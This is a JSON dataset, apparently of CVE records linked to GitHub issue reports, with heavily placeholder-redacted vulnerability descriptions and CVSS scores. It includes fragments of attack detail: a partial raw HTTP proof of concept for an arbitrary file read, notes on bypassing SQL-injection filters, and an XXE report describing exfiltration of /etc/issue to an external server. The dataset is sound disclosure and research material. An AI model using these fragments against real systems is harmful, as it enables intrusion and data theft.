        "description": "stack buffer overflow in function APITAG in parse.c. Stack buffer over found in parse.c in function APITAG The root cause maybe is in function APITAG the array accs and pits size is NUMBERTAG If APITAG bigger than NUMBERTAG then the array accs and pits will access out of index and corrupt the stack, if the value of APITAG is more bigger, then the stack frame will be corrupted. CODETAG gdb APITAG gef\u27a4 disassemble set_k_acc Dump of assembler code for function set_k_acc NUMBERTAG f NUMBERTAG c APITAG : endbr NUMBERTAG f NUMBERTAG APITAG : push rbp NUMBERTAG f NUMBERTAG APITAG : mov rbp,rsp NUMBERTAG f NUMBERTAG APITAG : sub rsp NUMBERTAG f NUMBERTAG APITAG : mov QWORD PTR [rbp NUMBERTAG rdi NUMBERTAG f NUMBERTAG APITAG mov rax, QWORD PTR [rbp NUMBERTAG f NUMBERTAG APITAG xor rax, QWORD PTR fs NUMBERTAG f NUMBERTAG e APITAG je NUMBERTAG f NUMBERTAG APITAG NUMBERTAG f NUMBERTAG APITAG call NUMBERTAG ba NUMBERTAG APITAG NUMBERTAG f NUMBERTAG APITAG leave \u2500 APITAG NUMBERTAG for (i NUMBERTAG i APITAG u. APITAG = accs[i NUMBERTAG s >u. APITAG = pits[i NUMBERTAG s >u. APITAG = nacc NUMBERTAG gef\u27a4 x/gx $rbp NUMBERTAG fffffffe NUMBERTAG gef\u27a4 p $fs NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32436",
        "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/85",
        "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/85",
        "Repo_new": "lewdlime/abcm2ps",
        "Issue_Created_At": "2021-04-27T07:57:56Z",
        "description": "out of bounds read in function APITAG in subs.c. Out of bounds read found in function APITAG in subs.c. The flow allows attackers to cause denial of service. Here didn't check whether APITAG is valid . gdb info: ERRORTAG reproduce : (poc zipped ) ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32437",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1770",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1770",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T08:10:59Z",
        "description": "Null pointer dereference in function gf_hinter_finalize APITAG A null pointer dereference issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32438",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1769",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1769",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T08:03:06Z",
        "description": "Null pointer dereference in gpac APITAG gf_media_export_filters. A null pointer dereference issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32439",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1774",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1774",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T08:40:50Z",
        "description": "Out of bounds Write in APITAG A OOB Write issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32440",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1772",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1772",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T08:25:12Z",
        "description": "SEGV in gpac APITAG function APITAG A SEGV issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3246",
        "Issue_Url_old": "https://github.com/libsndfile/libsndfile/issues/687",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/687",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2021-01-15T10:43:55Z",
        "description": "heap buffer overflow in in msadpcm_decode_block. Hi, I found a heap buffer overflow in in msadpcm_decode_block PATHTAG I'm on an NUMBERTAG Ubuntu NUMBERTAG with Clang NUMBERTAG The APITAG report is the following: ERRORTAG To reproduce on git master: CODETAG The testcase that triggers the bug is (decompress it before): FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32546",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/6555",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/6555",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2021-05-10T15:04:02Z",
        "description": "Remote Command Execution. Hello, we are security researchers from Unicorn ( URLTAG and we have identified a serious vulnerability that is exploitable from the position of a registered user. The vulnerability allows the Remote Command Execution, leading to full server takeover. The details will be sent to FILETAG as requested. Regards, Marek Malcovsk\u00fd & Petr Pernik\u00e1\u0159",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32559",
        "Issue_Url_old": "https://github.com/mhammond/pywin32/issues/1700",
        "Issue_Url_new": "https://github.com/mhammond/pywin32/issues/1700",
        "Repo_new": "mhammond/pywin32",
        "Issue_Created_At": "2021-05-11T20:56:14Z",
        "description": "Integer overflow in APITAG Context When an ACL is resized to add an ACE, it is possible to craft an integer overflow targeting the calculated\u202f APITAG . This results in a smaller than required buffer allocation which causes its\u202f memcpy \u202fof the ACL data to result in a heap overflow. Expected behavior and actual behavior Expected Behavior: Throw an exception indicating that the ACE could not be added because there is not enough room left in the ACL before hitting the size limit. Actual Behavior: The\u202f APITAG \u202fis overflowed and the\u202f memcpy \u202fresults in a heap overflow. Steps to reproduce the problem This was reproduced by adding roughly NUMBERTAG ACEs to an ACL. The exact count of ACEs that need to be added before reproducing the issue will vary based on the length of the SID in the ACE entry and the current size of the ACL being modified. Reproduction Goal: Add an ACE to an ACL such that the new size would be larger than\u202f APITAG . Version of Python and pywin NUMBERTAG Tested on Python NUMBERTAG with pywin NUMBERTAG b NUMBERTAG Appears to effect version b NUMBERTAG through b NUMBERTAG CVE CVETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3256",
        "Issue_Url_old": "https://github.com/poropro/kuaifan/issues/3",
        "Issue_Url_new": "https://github.com/poropro/kuaifan/issues/3",
        "Repo_new": "poropro/kuaifan",
        "Issue_Created_At": "2021-01-13T08:41:16Z",
        "description": "Arbitrary file read vulnerability in the html_url parameter of the FILETAG . Hello, I found that there is a Arbitrary file read vulnerability in the html_url parameter of the FILETAG file on the website. The html_url parameter is not filtered for dangerous characters, resulting in a vulnerability. FILETAG Read the database configuration file through the vulnerability FILETAG FILETAG poc : POST APITAG &vs NUMBERTAG c=chakanhtml&a=index HTTP NUMBERTAG Host: kuaifan.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG UM_distinctid NUMBERTAG aa0c7f NUMBERTAG b NUMBERTAG d9b NUMBERTAG a7a NUMBERTAG d4a NUMBERTAG aa0c7f NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32613",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/18679",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/18679",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2021-05-11T12:22:26Z",
        "description": "Heap memory bugs on pyc parse. Environment ERRORTAG Description APITAG While I am fuzzing rabin2 with I parameter, I am encountered several heap memory bugs with the same file on different sanitizers. I assume that if nested pyc magic byte NUMBERTAG is occured in file, radare2 tries to parse and does memory operations more than once and heap memory bugs are triggered. While ASAN throws heap use after free error on r_bin_object_set_items, MSAN and vanilla run throws double free error. This will lead seperate bugs both on r_bin_filter_name and r_bin_object_set_items . With ASAN: ERRORTAG With MSAN: ERRORTAG Without sanitizer: ERRORTAG Although, When I will test it with nested NUMBERTAG with no following bytes, It runs normally. ERRORTAG FILETAG It is failing with additional bytes after nested magic byte. FILETAG Test APITAG You can find files mentioned above in this zip file. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32615",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1410",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1410",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-05-13T10:37:45Z",
        "description": "NUMBERTAG user manager] SQL injection. As reported by Harry Goodman from NCC Group: > The \u2018order NUMBERTAG dir]\u2019 parameter in FILETAG is vulnerable to SQL injection > > I believe this is because of the following pieces of code: CODETAG > I would suggest either using the check_inputs function that your application seems to rely on, or depending on how much functionality is needed, just do a check to ensure the parameter is either ASC or DESC. > > CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-32618",
        "Issue_Url_old": "https://github.com/Flask-Middleware/flask-security/issues/486",
        "Issue_Url_new": "https://github.com/flask-middleware/flask-security/issues/486",
        "Repo_new": "flask-middleware/flask-security",
        "Issue_Created_At": "2021-05-17T01:18:29Z",
        "description": "Open Redirect Vulnerability. It has been reported that FS (all versions) have an open redirect vulnerabilty. This is due to a combination of FS not doing complete checking of whether a redirect URL is relative or absolute, and modern browsers willing to 'fill in the blanks' for slightly malformed URLs. Thus a URL of the form: FILETAG will cause many browsers to redirect to github.com after a successful login to your app. However by default, Werkzeug auto corrects Location headers to always be absolute so this vulnerability doesn't exist for many (most?) applications.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32630",
        "Issue_Url_old": "https://github.com/Admidio/admidio/issues/994",
        "Issue_Url_new": "https://github.com/admidio/admidio/issues/994",
        "Repo_new": "admidio/admidio",
        "Issue_Created_At": "2021-01-23T18:35:40Z",
        "description": "Authenticated local file inclusion possible. Authenticated Local File Inclusion. Need admin or upload permissions. Someone with upload permissions can use the move to db ability to \"get\" local files and move to the Documents & Folders view. The mitigation to block \"/\" from file names works, but if you double encode it, it bypasses the check...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3264",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/6",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/6",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2021-01-20T03:02:50Z",
        "description": "SQL injection vulnerability exists in FILETAG file. An SQL injection vulnerability exists in the front end FILETAG page You need to log in to admin before SQL injection. exp1: URLTAG Verify screenshot FILETAG exp2: URLTAG Verify screenshot FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-32640",
        "Issue_Url_old": "https://github.com/websockets/ws/issues/1895",
        "Issue_Url_new": "https://github.com/websockets/ws/issues/1895",
        "Repo_new": "websockets/ws",
        "Issue_Created_At": "2021-06-01T15:04:05Z",
        "description": "Backport Security Fix to NUMBERTAG APITAG [x] I've searched for any related issues and avoided creating a duplicate issue. Description Any chances the security fix patch URLTAG could be backported to NUMBERTAG to release a NUMBERTAG with the fix? Webpack dev server currently uses NUMBERTAG which has caused a flagged security issue in a lot of repos that can't be fixed until people can upgrade to the not yet stable webpack dev server NUMBERTAG URLTAG APITAG we are using webpack dev server as a dependency of react scrips so it will probably be a long time before react scripts updates to webpack dev server NUMBERTAG Admittedly being a dev server, this is (hopefully) only local, but it would be nice not to have a security alert stuck on our github repository. Reproducible in: version NUMBERTAG FILETAG version(s): OS version(s): Steps to reproduce NUMBERTAG Install webpack dev server Expected result: No security issue Actual result: Flagged security issues",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-32670",
        "Issue_Url_old": "https://github.com/simonw/datasette/issues/1360",
        "Issue_Url_new": "https://github.com/simonw/datasette/issues/1360",
        "Repo_new": "simonw/datasette",
        "Issue_Created_At": "2021-06-05T21:53:51Z",
        "description": "Security flaw, to be fixed in NUMBERTAG and NUMBERTAG Details to follow after the patch has been released.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3272",
        "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/259",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/259",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2021-01-06T05:48:40Z",
        "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow vulnerability in the current master branch (release version NUMBERTAG poc file : FILETAG ASAN report \u279c appl git:(master) \u2717 ./jasper input PATHTAG output test.jp2 warning: not enough tile data NUMBERTAG bytes) warning: bad segmentation symbol warning: bad segmentation symbol warning: bad segmentation symbol warning: bad segmentation symbol warning: component data type mismatch APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f8 at pc NUMBERTAG f NUMBERTAG ad NUMBERTAG be bp NUMBERTAG fffbeaa2a NUMBERTAG sp NUMBERTAG fffbeaa2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f8 thread T NUMBERTAG f NUMBERTAG ad NUMBERTAG bd in jp2_decode PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG in jas_image_decode PATHTAG NUMBERTAG f8d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG bde NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG f8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG c8 in jas_malloc PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in jp2_decode Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32823",
        "Issue_Url_old": "https://github.com/rubysec/ruby-advisory-db/issues/476",
        "Issue_Url_new": "https://github.com/rubysec/ruby-advisory-db/issues/476",
        "Repo_new": "rubysec/ruby-advisory-db",
        "Issue_Created_At": "2021-06-01T21:41:34Z",
        "description": "Add advisory for bindata. Potential APITAG which was fixed in URLTAG as part of bindata NUMBERTAG No CVE yet",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-32838",
        "Issue_Url_old": "https://github.com/python-restx/flask-restx/issues/372",
        "Issue_Url_new": "https://github.com/python-restx/flask-restx/issues/372",
        "Repo_new": "python-restx/flask-restx",
        "Issue_Created_At": "2021-08-31T17:26:29Z",
        "description": "GHSL NUMBERTAG Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. If you prefer to contact us by email, please reach out to EMAILTAG with reference to GHSL NUMBERTAG Thank you, Kevin Backhouse APITAG Security Lab",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-32849",
        "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/197",
        "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/197",
        "Repo_new": "gerapy/gerapy",
        "Issue_Created_At": "2021-05-14T12:11:59Z",
        "description": "APITAG Security Lab: Security Contact Needed. Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. If you prefer to contact us by email, please reach out to EMAILTAG with reference to APITAG . Thank you, Agustin Gianni APITAG Security Lab",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32849",
        "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/217",
        "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/217",
        "Repo_new": "gerapy/gerapy",
        "Issue_Created_At": "2021-11-22T09:05:04Z",
        "description": "Security Issue: GHSL NUMBERTAG gerapy. The APITAG Security Lab reported a potential security vulnerability (GHSL NUMBERTAG gerapy) in your project on PATHTAG It has been NUMBERTAG days since our initial report and as per our coordinated disclosure policy, we intend to publish a public advisory detailing this issue. If you do wish to further coordinate a response to this issue with the APITAG Security Lab, please contact us at EMAILTAG within the next NUMBERTAG days in reference to GHSL NUMBERTAG gerapy and we would love to help you resolve these issues. If not, feel free to close this issue after which we will proceed with advisory publication.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3286",
        "Issue_Url_old": "https://github.com/spotweb/spotweb/issues/653",
        "Issue_Url_new": "https://github.com/spotweb/spotweb/issues/653",
        "Repo_new": "spotweb/spotweb",
        "Issue_Created_At": "2021-01-21T18:18:48Z",
        "description": "SQL injection imcomplete fix. Describe the bug/issue Hi, I'm part of the Debian LTS Team and I'm investigating CVETAG , reported under NUMBERTAG describes an SQL injection. The fix from APITAG / APITAG introduces a black list and a regex to attempt to filter out the malicious payload. The fix is incomplete and a variation of the example payload escapes the black list. Have you searched the internet or Github for an answer? Yes. To Reproduce Follow NUMBERTAG and replace e.g. \"SELECT NUMBERTAG FROM\" with \"SELECT NUMBERTAG FROM\". Expected behavior User input escaped in SQL query. Desktop OS: Debian APITAG Spotweb Develop PHP NUMBERTAG Additional context Using a blacklist filter is not recommended in this scenario, because APITAG queries can be written in varied and unexpected ways, see e.g.: CVETAG FILETAG which recommends parametrization and white lists, among other solutions. The procedure is to request a new CVE identifier when an vulnerability was previously considered fixed. I plan to do that, unless you tell me not to before the end of the week.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3293",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/62",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/62",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2021-01-23T20:32:29Z",
        "description": "emlog NUMBERTAG has Full Path Disclosure vulnerability. emlog NUMBERTAG has Full Path Disclosure vulnerability emlog is a fast, stable and easy to use blog and CMS website building system based on PHP and APITAG site: FILETAG vulnerability in FILETAG line NUMBERTAG APITAG that uses a method of requesting a page like this: APITAG We can use a method of opening and closing braces that causes the page to output an error. This method would look like this: APITAG This renders the page defunct thus spitting out an error: APITAG POC: APITAG Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file. Certain vulnerabilities, such as using the APITAG (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. Examples: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33041",
        "Issue_Url_old": "https://github.com/yoshuawuyts/vmd/issues/137",
        "Issue_Url_new": "https://github.com/yoshuawuyts/vmd/issues/137",
        "Repo_new": "yoshuawuyts/vmd",
        "Issue_Created_At": "2021-05-17T08:58:43Z",
        "description": "Cross Site Scripting vulnerability. Hi, I'd like to report a security vulnerability in lastest release : Description: Cross site scripting (XSS) vulnerability(also execute constructed malicious code) Date: APITAG Version NUMBERTAG APITAG Tested on: Windows NUMBERTAG Mac POC The program does not properly handle the content of the code, causing the program to have a cross site scripting vulnerability, which can also execute constructed malicious code NUMBERTAG creat FILETAG file with the following content: ERRORTAG NUMBERTAG use FILETAG to open the FILETAG ,the poc code is executed NUMBERTAG pop up FILETAG XSS the file content code : ERRORTAG APITAG Execute malicious code the file content code : APITAG use FILETAG open FILETAG file to execute malicious code with xss vulnerability: APITAG when FILETAG open the FILETAG file , the poc code parsed in FILETAG APITAG , so it executed: APITAG Use the Poc APITAG on Mac: FILETAG How to fi NUMBERTAG Use an appropriate escaping/encoding technique depending on where user input is to be used: HTML escape, APITAG escape, CSS escape, URL escape, etc NUMBERTAG MD should sanitize the content in order to avoid XSS.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3309",
        "Issue_Url_old": "https://github.com/wekan/wekan/issues/3482",
        "Issue_Url_new": "https://github.com/wekan/wekan/issues/3482",
        "Repo_new": "wekan/wekan",
        "Issue_Created_At": "2021-01-25T22:42:05Z",
        "description": "Security: SSL/TLS certificate validation for LDAP disabled by default. As of writing, Wekan disables the SSL/TLS certificate validation for LDAP by default unless ERRORTAG URLTAG is explicitly set. Thus, by default, Wekan is effectively vulnerable to MITM attacks, even when using SSL/TLS for LDAP. I treat this default behaviour as bad, given that security shouldn't be opt in but opt out (e.g. for test only environments). As this behaviour does not seem to be properly documented for system administrators (at least not outside of the source code), I would treat this as a vulnerability following FILETAG and thus as a CVE worthy candidate. Oh, and please note that FILETAG itself has, according to its FILETAG , a security wise default by having true as default for ERRORTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-3312",
        "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/725",
        "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/725",
        "Repo_new": "alkacon/opencms-core",
        "Issue_Created_At": "2021-10-07T08:28:02Z",
        "description": "XXE vulnerability allows exfiltration of data from the server file system by uploading a crafted SVG. In APITAG NUMBERTAG it is possible for logged in users with edit permissions to exfiltrate data from the server's file system and send it to an external server by uploading specially crafted SVGs files. Example in which the first line of /etc/issue is read and sent to the server APITAG The SVG file to upload: CODETAG The FILETAG file served by the external server APITAG APITAG CVE ID: CVETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3312",
        "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/721",
        "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/721",
        "Repo_new": "alkacon/opencms-core",
        "Issue_Created_At": "2021-09-30T16:06:30Z",
        "description": "APITAG NUMBERTAG Security Vulnerability. Hello, I'm Riccardo Iesari from NTT Data Italia, during an assessment for a client we discovered a security vulnerability in APITAG NUMBERTAG The issue concerns an unrestricted file upload, this leads to several other vulnerabilities varying from stored XSS to RCE APITAG Command Execution). The exploit of this vulnerability allows a malicious user to directly attack the server where the CMS is running, expanding the attack surface. Below are some references from OWASP regarding the vulnerabilities found: URLTAG URLTAG We would like to know how to correctly report to you this vulnerability, feel free to contact us at riccardo. EMAILTAG . Best regards, Riccardo Iesari.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
